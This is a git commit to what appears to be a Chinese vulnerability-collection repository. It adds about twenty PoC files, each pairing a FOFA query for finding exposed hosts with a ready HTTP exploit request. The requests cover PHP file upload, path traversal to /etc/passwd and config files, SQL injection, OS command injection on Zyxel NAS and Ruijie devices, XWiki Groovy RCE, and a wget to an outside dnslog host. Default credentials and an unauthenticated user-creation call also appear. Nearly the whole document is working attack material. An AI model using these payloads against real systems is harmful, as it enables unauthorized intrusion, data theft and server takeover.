6.21更新漏洞

This commit is contained in:
wy876 2024-06-21 20:01:18 +08:00
parent 93b82ad285
commit 1fed97fd2a
22 changed files with 565 additions and 0 deletions

View File

@ -0,0 +1,53 @@
## APP分发签名系统index-uplog.php存在任意文件上传漏洞
## fofa
```
"statics/css/swiper.min.css" && "/user/messages/dialog"
```
## poc
```
POST /source/pack/upload/2upload/index-uplog.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 290
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfF7NbGp0PAFq8Mkd
Host: 127.0.0.1
Origin: http://127.0.0.1
Referer: http://127.0.0.1/source/pack/upload/2upload/index-uplog.php
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="time"
1-2
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="app"; filename="1.php"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
```
文件路径
` /source/data/tmp/1-2.php`
![image-20240621195533293](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211955382.png)
## 漏洞来源
- https://mp.weixin.qq.com/s/hCQnGoV4J-4-g_oEjmheGg

View File

@ -1,7 +1,13 @@
## H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞
## fofa
```
fid="tPmVs5PL6e9m5Xt0J4V2+A=="
```
## poc
```
POST /mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 127.0.0.1

View File

@ -1,6 +1,28 @@
# 漏洞收集
收集整理漏洞EXP/POC,大部分漏洞来源网络目前收集整理了600多个poc/exp善用CTRL+F搜索
## 2024.06.21 新增漏洞
- 真内控国产化开发平台接口preview任意文件读取漏洞
- 华测监测预警系统接口UserEdit.aspx存在SQL注入
- ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662)
- 契约锁电子签章平台add远程命令执行漏洞
- Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973)
- 新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞
- XWiki-Platform远程代码执行漏洞
- 学分制系统GetCalendarContentById存在SQL注入漏洞
- 云匣子系统接口ssoToolReport存在远程代码执行漏洞
- 泛微E-Cology-KtreeUploadAction任意文件上传漏洞
- 极限OA接口video_file.php存在任意文件读取漏洞
- 锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞
- 佑友防火墙后台接口download存在任意文件读取漏洞
- 佑友防火墙后台接口maintain存在命令执行漏洞
- 极企智能办公路由接口jumper.php存在RCE漏洞
- 用友Ufida-ELTextFile.load.d任意文件读取漏洞
- 易天智能eHR管理平台任意用户添加漏洞
- 多客圈子论坛前台SSRF漏洞
- APP分发签名系统index-uplog.php存在任意文件上传漏洞
## 2024.06.18 新增漏洞
- 禅道18.5存在后台命令执行漏洞
@ -13,6 +35,7 @@
- 致远互联FE协作办公平台ncsubjass存在SQL注入
- 世邦通信SPON-IP网络对讲广播系统my_parser.php任意文件上传漏洞
- 万户-ezOFFICE-download_ftp.jsp任意文件下载漏洞
- 平升水库水文监测系统默认密码
## 2024.06.14 新增漏洞

View File

@ -0,0 +1,23 @@
## ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662)
ShokoServer /api/Image/withpath/接口处存在任意文件读取漏洞,未经身份验证得攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
## fofa
```
title="Shoko WEB UI"
```
## poc
```
GET /api/Image/withpath/C:\Windows\win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
```
![image-20240621183622365](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211836419.png)

View File

@ -0,0 +1,23 @@
## XWiki-Platform远程代码执行漏洞
XWiki 的数据库搜索允许通过搜索文本远程执行代码。这允许公共 wiki 的任何访问者或封闭 wiki 的用户远程执行代码,因为默认情况下所有用户都可以访问数据库搜索。这会影响整个 XWiki 安装的机密性、完整性和可用性。
## fofa
```
body="data-xwiki-reference"
```
## poc
```
GET /xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22MiTian%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%288888%20%2B%206666%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)
```
![image-20240621185205531](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211852577.png)
## 漏洞来源
- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2858-8cfx-69m9

View File

@ -0,0 +1,29 @@
## Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973)
Zyxel NAS326 V5.21(AAZF.17)C0之前版本、NAS542 V5.21(ABAG.14)C0之前版本存在操作系统命令注入漏洞该漏洞源于setCookie参数中存在命令注入漏洞从而导致未经身份验证的远程攻击者可通过HTTP POST请求来执行某些操作系统 (OS) 命令。
## fofa
```
body="/cmd,/ck6fup6/user_grp_cgi/cgi_modify_userinfo"
```
## poc
```
POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6
------WebKitFormBoundaryHHaZAYecVOf5sfa6
Content-Disposition: form-data; name="c0"
storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#
------WebKitFormBoundaryHHaZAYecVOf5sfa6--
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211838104.png)

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,30 @@
## 佑友防火墙后台接口download存在任意文件读取漏洞
佑友防火墙网关管理系统download存在任意文件读取漏洞攻击者可利用该漏洞读取系统的文件。
## fofa
```
title=”佑友防火墙”
```
## poc
```
GET /index.php?c=backup&a=download&file=../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: your-cookie
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: frame
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4
```
使用密码登录` admin/hicomadmin`

View File

@ -0,0 +1,33 @@
## 佑友防火墙后台接口maintain存在命令执行漏洞
佑友防火墙网关管理系统maintain存在命令执行漏洞攻击者可利用该漏洞将恶意的系统命令拼接到正常命令中从而造成命令执行攻击。
## fofa
```
app="佑友-佑友防火墙"
```
## poc
```
POST /index.php?c=maintain&a=ping HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: your-cookie
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: frame
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
interface=&destip=127.0.0.1;whoami
```
使用密码登录` admin/hicomadmin`
![image-20240621193046736](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211930785.png)

View File

@ -0,0 +1,24 @@
## 华测监测预警系统接口UserEdit.aspx存在SQL注入
华测监测预警系统2.2 UserEdit.aspx 接口处存在SQL注入漏洞未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令从而控制服务器。经过分析与研判该漏洞利用难度低建议尽快修复。
## fofa
```
icon_hash="-628229493"
```
## poc
```
POST /Web/SysManage/UserEdit.aspx?&ID=1';WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
```
![image-20240621183452726](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211834786.png)

View File

@ -0,0 +1,21 @@
## 多客圈子论坛前台SSRF漏洞
/app/api/controller/Login.php 控制器中httpGet方法存在curl_exec函数且传参可控导致任意文件读取+SSRF漏洞
## fofa
```
"/static/index/js/jweixin-1.2.0.js"
```
## poc
```
/index.php/api/login/httpGet?url=file:///etc/passwd
```
![image-20240621195011935](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211950983.png)
## 漏洞来源
- https://mp.weixin.qq.com/s/S12FdNBxJXyS8QXrEHOTfg

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,39 @@
## 学分制系统GetCalendarContentById存在SQL注入漏洞
上海鹏达计算机系统开发有限公司成立于1996年上海睿泰企业管理集团成员位于上海市是一家以从事软件和信息技术服务业为主的企业。上海鹏达计算机系统开发有限公司学分制系统GetCalendarContentById存在SQL注入漏洞未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令从而控制服务器。
## fofa
```
body="www.pantosoft.com" && body="Pantosoft Corporation" || icon_hash="-1632820573"
```
## poc
```JAVA
POST /WebService_PantoSchool.asmx HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: ASP.NET_SessionId=e5l5acb3exqi5bmtezazrjsg
Upgrade-Insecure-Requests: 1
Priority: u=1
SOAPAction: http://tempuri.org/GetCalendarContentById
Content-Type: text/xml;charset=UTF-8
Host:
Content-Length: 314
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:GetCalendarContentById>
<!--type: string-->
<tem:ID>-7793' OR 7994 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (7994=7994) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(106)+CHAR(113))) AND 'qciT'='qciT</tem:ID>
</tem:GetCalendarContentById>
</soapenv:Body>
</soapenv:Envelope>
```
![image-20240621185739651](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211857723.png)

View File

@ -0,0 +1,16 @@
## 平升水库水文监测系统默认密码
## fofa
```
body="js/PSExtend.js"
```
## poc
```
Data86/Data86
admin/123
```
![image-20240619111253661](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406191112776.png)

View File

@ -0,0 +1,30 @@
## 新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞
新视窗新一代物业管理系统的XML Web services接囗GetCertifcatelnfoBvStudentld 实例处存在SQL注入漏洞未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
## fofa
```
body="BPMSite/ClientSupport/OCXInstall.aspx"
```
## poc
```
POST /OfficeManagement/RegisterManager/Report/Training/Report/GetprintData.asmx HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/GetCertificateInfoByStudentId"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetCertificateInfoByStudentId xmlns="http://tempuri.org/">
<studentId>1;WAITFOR DELAY '0:0:5'--</studentId>
</GetCertificateInfoByStudentId>
</soap:Body>
</soap:Envelope>
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211840774.png)

View File

@ -0,0 +1,27 @@
## 易天智能eHR管理平台任意用户添加漏洞
温州市易天信息科技有限公司主要经营易天人力资源管理软件是一家致力于人力资源管理软件产品研发的高科技公司。易天智能eHR管理平台任意用户添加漏洞。
## fofa
```
body="易天智能eHR管理平台"
```
## poc
```
GET /BaseManage/UserAPI/CreateUser?Account=stc&Password=123456&OuterID=888 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Priority: u=1
```
![image-20240621193645026](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211936086.png)
![image-20240621193657700](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211936732.png)

View File

@ -0,0 +1,18 @@
## 极企智能办公路由接口jumper.php存在RCE漏洞
极企智能办公路由接口jumper.php存在命令执行漏洞导致服务器权限沦陷。
## fofa
```
app="GEEQEE-极企智能办公路由"
```
## poc
```
GET /notice/jumper.php?t=;wget%20http://xxx.dnslog.cn HTTP/1.1
Host:
Connection: keep-alive
```

View File

@ -0,0 +1,11 @@
## 极限OA接口video_file.php存在任意文件读取漏洞
极限OA video_file.php 处存在任意文件读取,攻击者可以从其中获取网站路径和数据库账号密码等敏感信息进一步攻击。
## poc
```
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
```
![image-20240621191009647](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211910698.png)

View File

@ -0,0 +1,35 @@
## 泛微E-Cology-KtreeUploadAction任意文件上传漏洞
泛微OA E-Cology KtreeUploadAction 存在文件上传漏洞攻击者可通过漏洞上传webshell达到控制web服务器的权限
## fofa
```
app="泛微-协同商务系统"
```
## poc
```javascript
POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Content-Length: 160
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=--------1638451160
Cookie: Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test
Upgrade-Insecure-Requests: 1
----------1638451160
Content-Disposition: form-data; name="test"; filename="test.txt"
Content-Type: application/octet-stream
test
----------1638451160--
```
![image-20240621190834410](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211908456.png)

View File

@ -0,0 +1,22 @@
## 用友Ufida-ELTextFile.load.d任意文件读取漏洞
用友Ufida /hrss/ELTextFile.load.d 存在任意文件读取漏洞
## fofa
```
icon_hash="-628229493"
```
## poc
```
GET /hrss/ELTextFile.load.d?src=WEB-INF/web.xml HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
```

View File

@ -0,0 +1,23 @@
## 真内控国产化开发平台接口preview任意文件读取漏洞
真内控国产化平台 preview接口存在任意文件读取漏洞未经身份验证的攻击者可以通过构造精心设计的请求成功利用漏洞读取服务器上的任意文件包括敏感系统文件和应用程序配置文件等。导致系统处于极不安全的状态。
## fofa
```
body="js/npm.echarts.js"
```
## poc
```
GET /print/billPdf/preview?urlPath=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
```
![image-20240621183258115](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211832171.png)

View File

@ -0,0 +1,25 @@
## 锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞
锐捷统一上网行为管理与审计RG-UAC系列是星网锐捷网络有限公司自主研发的上网行为管理与审计产品static_convert.php存在远程命令执行漏洞导致服务器被控。
## fofa
```
title="RG-UAC登录页面"
```
## poc
```
GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'mht666'%20>>%20/var/www/html/mht.txt%0A HTTP/1.1
Host:
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```
写入`mht.txt`,文件访问`http://127.0.0.1/mht.txt`
![image-20240621192248862](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211922899.png)